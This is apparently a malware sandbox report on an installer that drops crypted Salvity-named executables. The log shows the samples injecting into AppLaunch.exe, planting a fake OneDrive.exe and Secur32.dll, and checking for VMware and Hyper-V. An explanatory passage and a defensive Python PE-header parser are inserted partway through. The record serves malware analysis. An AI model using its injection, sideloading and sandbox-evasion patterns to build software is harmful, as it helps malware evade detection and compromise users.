Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, |
0_2_0040460D |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_01 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6064:120:WilError_01 |
Source: C:\Windows\System32\conhost.exe |
Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4208:120:WilError_01 |
Source: 21.3.[New]Salvity_crypted(2).exe.2570000.0.unpack, u0002u2002.cs |
Cryptographic APIs: 'CreateDecryptor' |
Source: 25.2.AppLaunch.exe.400000.0.unpack, u0002u2002.cs |
Cryptographic APIs: 'CreateDecryptor' |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Source: [New]1.exe.0.dr |
Static PE information: section name: crL2t |
Source: [New]1.exe.0.dr |
Static PE information: section name: 0wrVPjE |
Source: [New]1.exe.0.dr |
Static PE information: section name: YW7wta |
Source: [New]1.exe.0.dr |
Static PE information: section name: obFJa |
Source: [New]1.exe.0.dr |
Static PE information: section name: e5WJl% |
Source: [New]1.exe.0.dr |
Static PE information: section name: 9RdLoc |
Source: [New]1.exe.0.dr |
Static PE information: section name: Lnxjc |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: CwRJt |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: V1Huayq |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: 3gNuta |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: qi7ga |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: p4YOu8 |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: jnlhoc |
Source: [New]Salvity_crypted(2).exe.0.dr |
Static PE information: section name: tM59c |
Source: OneDrive.exe.11.dr |
Static PE information: section name: _RDATA |
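The static PE lines earlier in the report and the section names above describe two different things. The NSIS installer (68e7a0fa9f7dbbb34bc4bad97690ea72.exe) has RELOCS_STRIPPED together with DYNAMIC_BASE: without a relocation table the loader cannot rebase the image, so the ASLR flag buys nothing and the stub always maps at its preferred ImageBase; NX_COMPAT and NO_SEH are normal for NSIS stubs. The dropped [New]1.exe and [New]Salvity_crypted(2).exe carry seven random section names each (crL2t, 0wrVPjE, ...), the mark of a crypter rather than of any mainstream linker, while OneDrive.exe's _RDATA is an ordinary MSVC section. The Python below is an added example, not the sandbox's own code: a struct-only reader for the COFF characteristics, DllCharacteristics and section table that reproduces these lines and emits triage notes. build_sample() constructs a header-only image so it runs without a real file, and the COMMON_SECTIONS list is my own and not exhaustive.

```python
"""Minimal PE header reader.

Added example, not the sandbox's own code. It reads the COFF header, the
DllCharacteristics word and the section table with struct alone, which is
enough to reproduce the report's 'Static PE information' lines and to flag the
randomised section names of the two dropped executables. build_sample()
constructs a header-only image so the code runs without a real binary."""
import struct

FILE_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
              0x0008: "LOCAL_SYMS_STRIPPED", 0x0020: "LARGE_ADDRESS_AWARE", 0x0100: "32BIT_MACHINE",
              0x0200: "DEBUG_STRIPPED", 0x2000: "DLL"}
DLL_FLAGS = {0x0020: "HIGH_ENTROPY_VA", 0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY",
             0x0100: "NX_COMPAT", 0x0400: "NO_SEH", 0x1000: "APPCONTAINER", 0x4000: "GUARD_CF",
             0x8000: "TERMINAL_SERVER_AWARE"}
SECTION_FLAGS = {0x00000020: "CNT_CODE", 0x00000040: "CNT_INITIALIZED_DATA",
                 0x00000080: "CNT_UNINITIALIZED_DATA", 0x20000000: "MEM_EXECUTE",
                 0x40000000: "MEM_READ", 0x80000000: "MEM_WRITE"}
# Names mainstream toolchains emit; my own list, deliberately short. Anything else
# (crL2t, 0wrVPjE, ...) deserves a second look.
COMMON_SECTIONS = {".text", ".rdata", ".data", ".idata", ".edata", ".pdata", ".rsrc", ".reloc",
                   ".bss", ".tls", ".crt", ".ndata", ".textbss", ".didat", "_RDATA"}


def flag_names(value, table):
    return [name for bit, name in sorted(table.items()) if value & bit]


def parse_pe(data):
    """Return characteristics, DllCharacteristics and sections of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in PE32 and PE32+
    sections = []
    for i in range(nsections):
        s = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": s[0].rstrip(b"\0").decode("latin-1"), "vsize": s[1],
                         "rva": s[2], "rawsize": s[3], "flags": flag_names(s[9], SECTION_FLAGS)})
    return {"machine": machine, "pe32plus": magic == 0x20B,
            "characteristics": flag_names(chars, FILE_FLAGS),
            "dll_characteristics": flag_names(dll_chars, DLL_FLAGS), "sections": sections}


def assess(pe):
    """Triage notes: ASLR that cannot work, writable code, and unusual section names."""
    notes = []
    if "DYNAMIC_BASE" in pe["dll_characteristics"] and "RELOCS_STRIPPED" in pe["characteristics"]:
        notes.append("DYNAMIC_BASE set but relocations stripped: the image cannot be rebased, "
                     "so it always loads at its preferred ImageBase")
    for s in pe["sections"]:
        if "MEM_EXECUTE" in s["flags"] and "MEM_WRITE" in s["flags"]:
            notes.append(f"section {s['name']} is writable and executable")
    odd = [s["name"] for s in pe["sections"] if s["name"] not in COMMON_SECTIONS]
    if odd:
        notes.append("non-standard section names: " + ", ".join(odd))
    return notes


def build_sample(section_names, chars=0x010F, dll_chars=0x8540, sec_flags=0x60000020):
    """Construct a header-only PE32 image (constructed test input, no code inside).

    The defaults reproduce the installer's flags: chars = RELOCS_STRIPPED | EXECUTABLE_IMAGE |
    LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE, dll_chars = DYNAMIC_BASE |
    NX_COMPAT | NO_SEH | TERMINAL_SERVER_AWARE, sec_flags = CODE | EXECUTE | READ."""
    opt_size, e_lfanew = 224, 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)
    shdrs = b"".join(struct.pack("<8sIIIIIIHHI", n.encode(), 0x1000, 0x1000 * (i + 1), 0x200,
                                 0x400 + 0x200 * i, 0, 0, 0, 0, sec_flags)
                     for i, n in enumerate(section_names))
    return dos + b"PE\0\0" + coff + bytes(opt) + shdrs


if __name__ == "__main__":
    pe = parse_pe(build_sample([".text", "crL2t", "0wrVPjE"]))
    print(pe["characteristics"], pe["dll_characteristics"])
    for note in assess(pe):
        print("-", note)
```

To run it against a real file replace the build_sample() call with `parse_pe(open(path, "rb").read())`; the section list then carries the same names the report prints.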
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
File created: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
File created: C:\Users\user\AppData\Roaming\[New]1.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
File created: C:\Users\user\AppData\Local\Microsoft\OneDrive\Secur32.dll |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAWen-USne |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: VMware |
Source: AppLaunch.exe, 0000000B.00000002.456230576.0000000006BD0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 0000000B.00000002.456337506.0000000006C12000.00000004.00000800.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMV |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: AppLaunch.exe, 00000019.00000002.796846831.0000000000D76000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Win32_VideoController(Standard display types)VMwareKA8A7T_ZWin32_VideoController84C7EP7MVideoController120060621000000.000000-00063410463display.infMSBDA1D9EZDPZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsWGRE8CMVrInte |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00429634 mov eax, dword ptr fs:[00000030h] |
11_2_00429634 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004326E4 mov eax, dword ptr fs:[00000030h] |
11_2_004326E4 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004326A0 mov eax, dword ptr fs:[00000030h] |
11_2_004326A0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00432715 mov eax, dword ptr fs:[00000030h] |
11_2_00432715 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00421C60 mov eax, dword ptr fs:[00000030h] |
11_2_00421C60 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A03A35 mov eax, dword ptr fs:[00000030h] |
21_2_00A03A35 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A0EC04 mov eax, dword ptr fs:[00000030h] |
21_2_00A0EC04 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009F27C0 mov eax, dword ptr fs:[00000030h] |
21_2_009F27C0 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00425476 SetUnhandledExceptionFilter, |
11_2_00425476 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00429143 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
11_2_00429143 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_004252E3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
11_2_004252E3 |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Code function: 11_2_00424E5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
11_2_00424E5C |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FA8E8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
21_2_009FA8E8 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_00A00430 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
21_2_00A00430 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: 21_2_009FAC0D IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
21_2_009FAC0D |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9C7008 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 9B4008 |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write |
Source: C:\Users\user\AppData\Roaming\[New]1.exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation |
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe |
Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A108E9 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A109CF |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A10934 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: EnumSystemLocalesW, |
21_2_00A06276 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
21_2_00A10DD3 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
21_2_00A10647 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
21_2_00A10FA8 |
Source: C:\Users\user\AppData\Roaming\[New]Salvity_crypted(2).exe |
Code function: GetLocaleInfoW, |
21_2_00A06798 |
Source: C:\Users\user\Desktop\68e7a0fa9f7dbbb34bc4bad97690ea72.exe |
Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, |
0_2_00403348 |